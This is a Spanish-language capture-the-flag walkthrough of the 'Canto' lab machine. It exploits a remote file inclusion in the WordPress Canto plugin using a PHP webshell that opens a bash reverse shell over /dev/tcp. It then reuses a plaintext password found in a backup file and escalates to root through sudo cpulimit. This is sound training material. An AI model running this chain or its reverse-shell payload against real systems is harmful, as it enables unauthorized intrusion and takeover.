Enumeramos puertos:
❯ sudo nmap -p- -sS --min-rate 5000 -n -Pn -oG 01-allPorts 192.168.1.25
❯ nmap -sCV -p 22,80 -oN 02-targeted.txt 192.168.1.25
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-08-09 22:02 -04
Nmap scan report for 192.168.1.25
Host is up (0.00030s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 9.3p1 Ubuntu 1ubuntu3.3 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.57 ((Ubuntu))
|_http-title: Canto
|_http-server-header: Apache/2.4.57 (Ubuntu)
|_http-generator: WordPress 6.5.3
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernelEs WordPress; con wpscan identificamos el plugin canto 3.0.4:
❯ wpscan --url http://192.168.1.25 --plugins-detection aggressive -t 50
...
[+] canto
| Version: 3.0.4 (100% confidence)
...Buscamos exploits para ese plugin (RFI/RCE):
❯ searchsploit wordpress canto
...
Wordpress Plugin Canto < 3.0.5 - Remote File Inclusion (RFI) and Remote Code | php/webapps/51826.py
...Usamos el exploit para ejecutar una webshell PHP:
❯ cat pwned.php
<?php
shell_exec("bash -c 'bash -i >& /dev/tcp/192.168.1.5/4321 0>&1'");
?>
❯ python3 51826.py -u http://192.168.1.25 -LHOST 192.168.1.5 -LPORT 1234 -s pwned.php
❯ ncat -nlvp 4321
Ncat: Connection from 192.168.1.25:54158.
bash: cannot set terminal process group (916): Inappropriate ioctl for device
bash: no job control in this shell
www-data@canto:/var/www/html/wp-content/plugins/canto/includes/lib$En el home de erik hay notas que apuntan a un backup, donde están sus credenciales:
www-data@canto:/home/erik/notes$ cat Day2.txt
I almost lost the database with my user so I created a backups folder.
www-data@canto:/var/wordpress/backups$ cat 12052024.txt
------------------------------------
| Users | Password |
------------|----------------------|
| erik | th1sIsTheP3ssw0rd! |
------------------------------------Entramos por SSH como erik y obtenemos la primera flag:
❯ ssh erik@192.168.1.25
erik@192.168.1.25's password: th1sIsTheP3ssw0rd!
erik@canto:~$Revisamos sudo -l:
erik@canto:~$ sudo -l
...
User erik may run the following commands on canto:
(ALL : ALL) NOPASSWD: /usr/bin/cpulimitcpulimit puede lanzar un proceso arbitrario (-f), así que ejecutamos una bash de root:
erik@canto:~$ sudo cpulimit -l 100 -f /bin/bash
Process 3137 detected
root@canto:/home/erik#Obtenemos nuestra flag.
Fin.